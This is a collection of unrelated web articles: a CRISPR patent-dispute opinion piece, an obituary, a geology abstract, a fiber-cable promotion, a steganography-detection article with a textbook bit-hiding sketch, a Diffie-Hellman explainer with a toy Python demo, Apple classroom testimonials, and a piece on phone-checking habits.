Last month, in an extraordinary dispute before the US Patent and Trademark Office (USPTO), university lawyers laid out their clients' legal strategies for claiming patents that cover the celebrated gene-editing technology CRISPR–Cas9. Over the next year, the USPTO will receive volumes of evidence centred on who first invented the technology. Battles over scientific priority are as old as science itself. But the CRISPR–Cas9 patent dispute is unusual because it pits two leading research institutions against one another for the control and industrial development of a foundational technology: the University of California, Berkeley (UC Berkeley), and the Broad Institute of MIT and Harvard in Cambridge, Massachusetts. As scientific institutions increase their involvement in the commercialization of research1, it is worth considering the potential consequences for science if more institutions follow the path of UC Berkeley and the Broad Institute. In May 2012, researchers at UC Berkeley, led by Jennifer Doudna and her collaborator, Emmanuelle Charpentier (then located at the University of Vienna in Austria) filed a patent application in the United States for CRISPR–Cas9. Seven months later, Feng Zhang, a researcher at the Broad Institute, filed a competing application that covered similar uses of the technology. After Zhang's lawyers requested that his application be fast-tracked, the USPTO awarded one patent to Zhang in April 2014, followed by a dozen more in the subsequent 12 months. Meanwhile, the application made by Doudna and her colleagues languished. Last April, Doudna's lawyers requested that the USPTO conduct a specialized legal trial, known as a patent interference, to determine the ownership of the US patents that cover the CRISPR–Cas9 system. This January, the USPTO formally agreed to carry out the proceeding. One conspicuous aspect of this case, in my opinion, is the degree to which UC Berkeley and the Broad Institute have weighed in on what is essentially a dispute over scientific priority. The Broad Institute has produced press releases, videos and a slick feature on its website that stress the importance of Zhang's contributions to the development of the CRISPR–Cas9 technology. And earlier this year, the central positioning of Zhang's work in a historical perspective of CRISPR published in Cell2 by the president and director of the Broad Institute, Eric Lander, prompted a storm of angry responses from scientists, including Doudna and Charpentier. Meanwhile, at UC Berkeley, a press release that discussed the potential of CRISPR described Doudna as “the inventor of the CRISPR–Cas9 technology”. The financial stakes are high. The CRISPR–Cas9 patents are widely viewed to be worth hundreds of millions, if not billions, of dollars. Both organizations have invested directly in spin-off companies that were co-founded by their researchers — the Broad Institute in Editas Medicine, co-founded by Zhang, and UC Berkeley in Caribou Biosciences, co-founded by Doudna. A report submitted by Editas in January to the US Securities and Exchange Commission lists the Broad Institute and other Harvard-affiliated institutions as owning a major equity stake in the company: about 4.2% of its common shares. Efforts to commercialize the research output from universities played out differently in the past. 
Since 1980, US universities have been able to patent the inventions of their researchers, thanks to the Bayh–Dole Act — legislation that determines the ownership of intellectual property arising from federally funded research. But for the most part, institutions have kept their distance from disputes over scientific priority. In fact, after factoring in the costs of filing patents and staffing, university technology-transfer offices have generally been money losers for their institutions3. Even in the case of lucrative patents, commercial development has frequently been left to venture capitalists and the researchers themselves. Take the Cohen–Boyer patents, which covered early gene-splicing technology and netted Stanford University and the University of California, San Francisco (UCSF), both in California, hundreds of millions of dollars in licensing fees during the 1980s and 1990s. In this instance, Genentech, the company in South San Francisco, California, that was formed to commercialize the underlying technology, sprung from the efforts of Herbert Boyer, one of the founding researchers, and the financier Robert Swanson. The company was neither owned by, nor an exclusive licensee of, Stanford or UCSF. Research institutions in general are starting to play a bigger part in shepherding their researchers' projects through the commercialization process. A 2014 report from the Association of University Technology Managers in Oakbrook Terrace, Illinois — an organization that supports managers of intellectual property at academic research institutions, non-profit organizations and government agencies worldwide — documented that universities are increasing equity investments in their researchers' start-up companies. Of the patent licences granted by universities in 2014, 10% were tied to such investments1, compared with 6.7% in 1999 (ref. 4). I am concerned that such involvement in commercialization has the potential to clash with the broader, educational mission of research institutions. Universities worldwide have long strived to foster a culture of scientific collaboration. Even when universities have obtained broad patents, as the Carnegie Institute of Washington in Washington DC did in the early 2000s for a gene-expression control technology known as RNA interference, licences have been cheap and easy for researchers to obtain5. In other cases, scientists have simply ignored patents that cover fundamental technologies6. Academic research institutions now seem less shy about taking each other to court for patent infringement. In 2011, the University of Utah in Salt Lake City sued the Max Planck Society for the Advancement of Science in Germany over claims to a patent that covered a technology called short interfering RNA, which inhibits gene expression (see go.nature.com/vyujnp). And over the past four years, Stanford University and the Chinese University of Hong Kong in Sha Tin have engaged in a heated patent litigation over prenatal genetic diagnostic blood tests, a market that was worth US$530 million in 2013. In the current era of budget tightening, universities of all stripes might be tempted to use licensing fees as another funding mechanism. The University of South Florida in Tampa, for example — a public institution that had its state funding cut by $48 million in 2012 — holds a substantial number of patents that have not yet been licensed and has a famously low ratio of patent-licence revenue to research expenditure7. 
If its financial situation were to deteriorate further, the university might be compelled to extract licence fees from other research institutions for those patents. It would be wrong to suggest that patents, writ large, are failing educational research institutions. In the cases of gene splicing, RNA interference and human embryonic stem cells, patents have been major earners for institutions and researchers without damaging the scientific enterprise5. But an obvious danger of increasing the focus on commercialization is that educational institutions will view scientific research as a path to profit, above all else. It is not hard to imagine that patent disputes might lead to university administrators pushing certain views on their scientists, denigrating collaboration with researchers from competing institutions and tasking tenure committees with valuing patents over publications. Where scientific advances have the potential to be profitable, universities should support researchers to bring that work to fruition. This might include helping them to secure patents. But it is my view that serious commercialization efforts — such as granting exclusive licences or receiving equity ownership in researchers' start-ups — should be left to industry. The CRISPR–Cas9 dispute could have played out very differently. Zhang and Doudna were both co-founders of Editas. And UC Berkeley and the Broad Institute could have filed patent applications that listed the research teams from both institutions as co-inventors. Any resulting patents could then have been freely or cheaply licensed to other research institutions, or used to fund a joint academic organization dedicated to studying the technology. The patents could also have been widely, but not exclusively, licensed to a variety of industry competitors — promoting a robust, competitive market for commercial CRISPR–Cas9 applications and creating a funding stream for further academic research. Biomedical research in educational institutions has long prided itself on a culture of openness and sharing — one that both Zhang and Doudna have exercised by donating various components of the CRISPR–Cas9 system to the open-science consortium Addgene in Cambridge, Massachusetts. The incentives that patents create for educational institutions should not be allowed to erode scientific collaboration.
Kempton H. Roll, founding executive director of the Metal Powder Industries Federation (MPIF) died on 4 November 2015, following a short illness. Well-known in the national and international metalworking communities, Roll retired in 1988 after a 40-year career. He joined the Lead Industries Association in 1948 as technical director with responsibilities for the former Metal Powder Association (MPA), forerunner of MPIF. He was named executive director of MPA in 1956 and helped found MPIF in 1957 as the umbrella organization representing different sectors of the metal powder producing and consuming industries. He was also executive director of APMI International, the professional society for powder metallurgy (PM) that he helped found in 1959, and served as publisher of the International Journal of Powder Metallurgy. He attended Carnegie Institute of Technology and graduated from Yale University in 1945 with a degree in metallurgical engineering and served in the Pacific during World War II as a bomb disposal officer with the U.S. Navy. He wrote extensively about the technology of powder metallurgy (PM) and was co-editor of six books in the series Perspectives in Powder Metallurgy, published by Plenum Publishing Corp and MPIF. He received the prestigious Powder Metallurgy Pioneer Award in 1992 and the Distinguished Service to Powder Metallurgy Award in 1988, both from MPIF. In 2007, to honor his lifetime accomplishments, MPIF created the Kempton H. Roll PM Lifetime Achievement Award which is presented every four years. He was named a Fellow of ASM International in 1987 and was a Legion of Honor member of the Minerals, Metals and Materials Society. This story is reprinted from material from the MPIF with editorial changes made by Materials Today. The views expressed in this article do not necessarily represent those of Elsevier.
Refsnider K.A.,University of Colorado at Boulder |
Miller G.H.,University of Colorado at Boulder |
Hillaire-Marcel C.,University of Quebec at Montreal |
Fogel M.L.,Carnegie Institute |
And 2 more authors.
Geology | Year: 2012
Subglacially precipitated carbonate crusts (SPCCs) formed on bedrock and till boulder surfaces adjacent to the Barnes Ice Cap (BIC), central Baffin Island, Arctic Canada, act as unique archives of Laurentide Ice Sheet basal conditions. Uranium-series dating of these features reveals that carbonate precipitation from subglacial meltwater occurred during the Last Glacial Maximum (LGM), requiring warm-based ice in the region at that time. However, the preservation of fragile SPCCs is unlikely beneath erosive warm-based ice, suggesting that the transition to subsequent cold-based conditions took place shortly after the LGM, and glacial erosion in the region occurred dominantly prior to the LGM. The oxygen isotopic composition of the meltwater from which the SPCCs precipitated is indistinguishable from that of the debris-rich BIC basal ice (δ18O -24‰ referenced to Vienna standard mean ocean water), but distinct from that of the overlying white Pleistocene ice (δ18O ~-35‰), demonstrating that SPCCs are reliable archives of the isotopic composition of only the basal ice of past ice sheets. © 2012 Geological Society of America. Source | <urn:uuid:3a1173c0-06e0-4223-8475-a64a79d1d366> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/carnegie-institute-1141103/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00072-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946269 | 3,293 | 2.8125 | 3 |
As modern technology has developed, it has become apparent that computer data needs a faster and more economical way of travelling around. Many new networks choose bulk fiber cable instead of traditional copper-based cables to increase the capability and speed of the network.
Fiber optic transmission has the benefits of light weight, small size, long transmission distance, large capacity, low signal attenuation and immunity to electromagnetic interference, and it has been widely adopted by a number of networks. In the twenty-first century, fiber optic cables, especially bulk fiber cable, will constitute the primary body of our data transmission, telecommunications, CATV and radio networks, along with other dedicated networks.
Many would argue that the expense involved isn't worthwhile for smaller installations, but buying bulk fiber cable can give you huge savings, making prices almost comparable. As with most bulk cable purchases, you will likely be expected to cut the cable and attach the fiber optic connectors yourself, which is not a serious problem if you know how it works.
In short, bulk fiber cable is a network cable that works in exactly the same way as any other fiber optic cable. Rather than using copper as a conductor, fiber cables use glass fibers to carry data. Unlike current-driven cables such as CAT5 and CAT6, a fiber cable uses pulses of light to transfer data with much less loss over long distances. To give you an idea of just how much data this type of cable can handle, it has been tested at speeds well over one hundred megabits with very little signal loss.
The ability to transfer a signal over distances of kilometers rather than meters is what makes bulk fiber cable such an appealing prospect. Setting up a network over extended distances used to require signal repeaters along the entire cable run to maintain a continuous connection. Only needing one piece of cable instead makes the cost of fiber cable much more manageable for larger installations.
While the technology behind this kind of cabling is still fairly fresh, network installations built on it are becoming much faster and more consistent. Purchasing a range of pre-cut cable lengths can quickly eat into a budget, whereas making your own cables will save substantial sums of money. Considering that many networks have only recently been upgraded to CAT6 cabling, a lot of companies should probably wait a while before they make the jump to fiber. But any organization that wants to install the best possible network solution should look at using fiber cable for the job, and purchasing bulk fiber cable will help reduce the overall cost.
Bulk fiber cables come in many different types, based on where they will be installed. You can find reliable bulk fiber cables on the Internet. For example, China fiber optic products supplier FiberStore supplies a wide range of optical fiber cable products including indoor cables, outdoor cables, FTTH cables, armored cables, LSZH cables and some special cables. These are as diverse as aerial cables, building cables, direct-buried cables, duct cables and underwater/submarine cables. Some of the optical fiber cables come with steel tube and steel wire armoring, suitable for sea, lake and river applications. Only optical fiber that meets or exceeds industry standards is used, to ensure quality products with best-in-class performance.
Hidden in plain sight
Image and audio files can hold tomes of secrets
- By Patience Wait
- May 13, 2005
Steganography literally means 'covered writing.' A Greek term, it refers to hiding one message inside another. While the concept has been around for centuries, the marriage of computers and the Internet has brought it to fruition.
'This whole concept was created in the Middle East, and that part of the world has been practicing the method for millennia,' said Chet Hosmer, the FLETC session's instructor and CEO of WetStone Technologies Inc., a software company in Cortland, N.Y.
Both picture and audio files are ideal for containing hidden messages, he explained; they tend to be very large, and software that substitutes single bits of data at the end of an eight-bit packet creates differences so subtle they can't be detected by the human eye or ear.
'The Old Testament, the New Testament and all the works of Shakespeare can be hidden in one six-minute song,' Hosmer said. 'This is not a small covert channel.'
In steganography, or stego for short, the visible or audible message is called the carrier, he said, while the hidden message is the payload. Together they form the covert message.
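To make the bit-substitution idea concrete, here is a rough sketch (not one of WetStone's tools; the function names are illustrative) that hides a payload in the least-significant bit of each byte of a carrier buffer. With an image, the buffer would be the decoded pixel data:

def embed_lsb(carrier: bytearray, payload: bytes) -> bytearray:
    # Hide each payload bit in the least-significant bit of one carrier byte.
    bits = []
    for byte in payload:
        bits.extend((byte >> i) & 1 for i in range(7, -1, -1))
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for payload")
    stego = bytearray(carrier)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit     # change at most the lowest bit
    return stego

def extract_lsb(stego: bytearray, n_bytes: int) -> bytes:
    # Read the low bit of each carrier byte back out, eight bits per payload byte.
    out = bytearray()
    for i in range(n_bytes):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | (stego[i * 8 + j] & 1)
        out.append(byte)
    return bytes(out)

Because only the lowest bit of each byte changes, the altered pixels differ from the originals by at most one intensity level, which is why the change is invisible to the eye; it is exactly these subtle statistical traces that detection tools hunt for.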
The method has a big advantage over encryption as a way of transmitting messages, Hosmer said. Encrypted messages are visible; while they are encoded, there is no question that somone is trying to hide something.
Stego, on the other hand, is a classic example of hiding something in plain sight; one has to know to look for the hidden message. For instance, a payload could be hidden in a digital photo of an item that is going to be sold on an online auction site, where hundreds or thousands of people may look at it or download it. 'That way, you can hide who you were delivering the message to,' he said.
Hosmer's company has created software tools agents can use to look for the small clues that indicate a data file has been turned into a covert message. For instance, looking at the color palette used in a digital photo can reveal manipulation; a picture with a message hidden inside will have a more limited palette, with 'blocks' of colors close together. Examining a photo for hues, edges and shadows is another way to turn up traces of stego embedded in a photo file.
In an audio file, stego messages are frequently hidden in the seeming silence at the beginning of each song. By comparing the wave signature of the suspect file to a known clean copy of the song, one can see if additional information has been inserted.
There are other forms of steganography, such as ap- pending data at the end of a file, after the standard end-of-file marker. There also is word substitution; there are Web-based tools, for instance, that will mimic spam, encoding the real message as a spam e-mail.
'There are over 300 stego programs now available. In 2000, there were only about 50,' Hosmer said; the jump is one indication of how popular this method has become for conveying secret information. For instance, law enforcement agents are now finding the use of stego in gang Web sites.
'We are still catching up with the bad guys,' he said. 'We're worried about programs we haven't seen before. We're developing a mathematical model of 'normal' files' to improve the search process. | <urn:uuid:b2130190-17ce-402d-8a1a-1c9d017f1b95> | CC-MAIN-2017-04 | https://gcn.com/articles/2005/05/13/hidden-in-plain-sight.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00402-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938278 | 722 | 2.734375 | 3 |
Diffie-Hellman is a key exchange protocol developed by Diffie and Hellman (imagine that) in 1976. The purpose of Diffie-Hellman is to allow two entities to exchange a secret over a public medium without having anything shared beforehand. As it turns out, this is an extremely important function, and understanding how Diffie-Hellman accomplishes this should be a point of interest for any information security enthusiast.
Two values, called Diffie-Hellman parameters, are at the core of this protocol, and they consist of a very large prime number p, and a second related “generator” number, called g, that is smaller than p. The value for g is tied very strongly to its associated p value. The nature of this relationship is that for each number n, there is a power k such that n = g^k % p.

Each host must agree on these two parameters (p and g) in order for the protocol to work. Finally, a third and private value, called x, is also generated for each host. This value, unlike p and g, is not shared.
Public values (to be exchanged with each other) are then generated with this function:
y = g^x % p
…or in other words, take value g and raise it to the power of value x, divide that by p, and your remainder is your public value y. Then, the two parties exchange their y's with each other and the exchanged numbers are used to create the shared secret z as follows:
z = y^x % p
…or, take the exchanged public key y and raise it to the power of your private key x, and divide that by the shared value p. The shared secret, z, is the remainder of that operation.
The beauty of Diffie-Hellman is that after each party does this independently, they will both end up with the exact same value for z! This means they now have an outstanding key for whatever encryption algorithm they decide on using for the rest of their communication.
This works because:
z = (g^x % p)^x' % p = (g^x' % p)^x % p
Note that the portion of the equation above in parenthesis is the other host’s “public key”, and that it has the other host’s private value in it. This is what makes the arrival at a mutual secret possible mathematically.
So here’s how it breaks down:
- Exchange some numbers over a public medium
- Create your own private number that won’t be exchanged
- Generate a public “key” from the previously agreed upon numbers combined with your private value
- Perform a calculation using their public value, your private value, and the shared parameters
- Your result will match that of your partner doing the same thing
- You now have a shared secret without it ever crossing the public medium!
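For the programmatically inclined, the whole exchange fits in a few lines of Python. This is a minimal sketch for illustration only, reusing the toy parameters from above; a real implementation would use a vetted cryptographic library and primes of 2048 bits or more.

import secrets

p, g = 23, 5                              # shared parameters (toy-sized!)

# Each side generates a private value that never leaves its machine.
x_alice = secrets.randbelow(p - 2) + 1    # 1 <= x <= p - 2
x_bob = secrets.randbelow(p - 2) + 1

# Public values y = g^x % p, exchanged over the open medium.
y_alice = pow(g, x_alice, p)
y_bob = pow(g, x_bob, p)

# Each side raises the *other* side's public value to its own
# private value: z = y^x % p.
z_alice = pow(y_bob, x_alice, p)
z_bob = pow(y_alice, x_bob, p)

assert z_alice == z_bob                   # same secret on both sides
print("shared secret:", z_alice)

Python's three-argument pow performs the modular exponentiation efficiently, so the same code works unchanged with realistically sized parameters.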
The magic of Diffie-Hellman is that you not only end up with a shared secret, but the secret is never sent over the wire. Each side comes up with it independently, and that’s what makes the protocol so beautiful. | <urn:uuid:63139a4a-a37a-4fd6-87e9-7c2d7823c764> | CC-MAIN-2017-04 | https://danielmiessler.com/study/diffiehellman/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00338-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926453 | 885 | 4.15625 | 4 |
Our Apple in the classroom series continues with six more educators explaining how Apple technology has helped shape teaching and learning, and what their favorite Apple technology in the classroom is and why.
Lucy Gray, Education Consultant at Lucy Gray Consulting @elemenous
Global collaboration: creating an eBook with students from 20 other countries.
One of the best examples showing how Apple has transformed learning is the “If You Learned Here” Project, according to education consultant Lucy Gray. She had presented at an Apple Distinguished School meeting on global connections, and two teachers Mary Morgan Ryan and Carolyn Skibba went back to their classrooms to design their own collaborative project. In the end, it involved 70 schools from 20 countries using a myriad of tools, including Flipgrid, Padlet and Book Creator to pull together a collaborative eBook written by students from around the world. The project offers “a great example of how educators can bring the world into their classrooms,” adds Gray.
What’s her favorite Apple Technology? iTunes U, as it offers a repository of mostly free content for all levels of education. “There is a treasure trove of material within iTunes U including videos, podcasts, iBooks, and other digital documents. Colleges and universities, K12 schools, and institutions of informal learning have created channels showcasing great resources for others,” says Gray. "Also, iTunes U Course Manager is available for those who want to build their own collections of content. My favorite channel on iTunes U is the Apple Distinguished Educator channel!"
Scott Newcomb, Fourth Grade Teacher at St. Mary’s Intermediate School and Blogger/Consultant for The Mobile Native @SNewco
Using apps to offer discreet, individualized instruction for fourth grade math students.
“Apple has transformed learning by increasing mobility, collaboration and creativity,” says Scott Newcomb, a fourth grade teacher and blogger/consultant. Having iPad Minis in his classroom has had a huge impact on his students: “Their learning is no longer tethered to their desks. It has leveled the playing field. All students feel that they can contribute to the activity.”
Specifically, Newcomb has his students use math apps on the iPad Mini to sharpen their skills. He also incorporates blended learning by having the students use online math programs to differentiate instruction.
The technology works well for him because it lets him individualize and differentiate instruction through these apps, tailoring lessons to each student's individual needs. “Through the integration of iPad Minis, I am able to differentiate instruction without drawing attention to specific students, as all will be working on the same type of device,” he adds.
Daniel Edwards, Director at Stephen Perse Foundation schools, Co-author of Educate 1-to-1 @syded06
Just tap twice for a media-rich learning experience on the big screen.
Daniel Edwards is director at Stephen Perse Foundation schools and co-author of Educate 1-to-1. His schools work on two key principles when using technology to enhance learning: providing seamless access to content and removing barriers to learning.
In terms of achieving the former, the schools use iTunes U as the content delivery mechanism. For the latter, they offer a 1-to-1 iPad environment to provide students with instant access to materials they need. Using the iPad, “students can now receive feedback on their assignments and act on it before their next 'contact' period with the teacher,” he says. “We see this as a crucial aspect in our desire to enhance the learning process.”
The iPad has greatly changed Edwards's approach to teaching by offering a media-rich platform coupled with access to student information and feedback – all available with “a couple of taps on a screen.” By pairing this with the Apple TV, Edwards says he is free to teach and address individual concerns more readily: “It used to be so difficult five years ago to do the things I've always wanted to do. And now I just tap a screen.”
Terry Heick, Founder/Director of TeachThought.com @terryheick
Apps are the new textbook, and we’re nowhere near our potential.
“While the iPad hardware is impressive, Apple was way, way out ahead of competing platforms in fostering the growth of high-quality, innovative, and polished apps,” states Terry Heick, founder and director of TeachThought.com. And while this hasn't ‘transformed’ learning, it has created a compelling alternative to the textbook, made project-based learning more accessible, and begun to illuminate what's possible with mobile learning. He adds, “we're nowhere near our potential here, either.”
Heick believes that the iPad is probably the best thing Apple has created, as he says that BYOD is not something most schools and districts are comfortable with. “So even while the iPad seems to kind of hit a wall in terms of sales, by empowering students, it wins,” explains Heick.
Laura Blankenship, Chair and Dean of Academic Affairs at The Baldwin School @lblanken
Students demonstrate learned concepts by creating movies about robots and binary code.
Laura Blankenship is chair and dean at The Baldwin School, which became a 1-to-1 MacBook school two years ago. “I have to say, it has transformed so many of our classes,” she states. The biggest result Blankenship has seen is that learning is now less passive, as teachers now have students actively shape their own learning. By using e-texts and online resources for classroom materials, the school has also expanded the kinds of materials it uses and is no longer stuck with static textbooks, “which can get out of date far too quickly,” says Blankenship.
She enthusiastically calls out iMovie as her favorite Apple technology, adding, “there are so many ways this can be used for students to demonstrate what they know, and it's such a flexible platform that students are really only limited by their imagination.”
In the classroom, her students use iMovie to create videos to demonstrate the concepts they've learned, even in computer science. Examples include how-to videos for making robots sing or draw, and explanations of the binary number system. Blankenship explains, “Because they can easily add video, photos and music all together, students can easily make many different kinds of videos. The end results are never boring!”
Beth Blecherman, Founder of Techmamas
Tablets for the win: enabling intuitive and easy student learning.
“My favorite Apple technology is the iPad because the tablets are intuitive and easy to use for students,” says Beth Blecherman of Techmamas. Her sixth graders integrated iPads into their curriculum this year with wide success, making it a “transformative year.”
For other classrooms looking to do the same, Blecherman recommends leveraging an infrastructure of automated tools to help with your school’s internal communication. “We had that this year and all teachers participated which made the school workflow very efficient. I commend the staff at our Middle School for the work they did to bring the technology and workflow into the classroom in a way that enriched the kids’ learning environment and made the workflow more organized,” says Blecherman. | <urn:uuid:61a216e7-740e-403a-912b-ede41c440217> | CC-MAIN-2017-04 | https://www.jamf.com/blog/how-has-apple-transformed-your-classroom-part-ii/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00246-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961444 | 1,531 | 3 | 3 |
Cell phones are ubiquitous and so is the sight of people staring into them while doing something else - waiting in line, driving a car, walking into a pole and so forth.
The Boston Globe reports that phone-checking has become a major - and in the case of texting while driving, deadly - habit.
"Our phones have effectively programmed us with new habits, including a powerful urge to pull them out when we’re not supposed to," notes writer Leon Netfakh.
What causes that urge? Simply put, habit. We are programming ourselves to pick them up constantly. These habits are caused by triggers - an action, thought or feeling that leads to another specific act, in this case, checking your phone.
Think about it: If you have it programmed to vibrate or emit a sound when you receive a text message or e-mail, there's your trigger. You hear the sound or feel the haptic feedback and that triggers your brain to pick up and scan your phone.
However, you may be picking up your phone repeatedly even without such an obvious trigger. Neyfakh cites a study in which participants were given smartphones for six weeks. The phones were loaded with usage-tracking software, which revealed that the more than 130 subjects "pulled out their devices for very brief periods up to 60 times per day."
If you're triggered by sounds or vibration, habit-breaking is easy: set your notifications to mute. But how does one battle the habit of incessant phone-checking in other instances? Neyfakh argues: "fight habit with habit."
In this case, treat phone-checking like any other bad habit you're trying to break.
Step 1: Identify what's triggering your urge to check your phone.
Step 2: Develop another response to the trigger to circumvent unnecessary or excessive phone usage.
Say, for instance, you realize you constantly check your phone while driving. You assess the situation and realize you do so because you're bored, stuck in traffic, etc. In this case, you can create a new habit by leaving your phone in the trunk, on the back seat or anywhere out of arm's reach.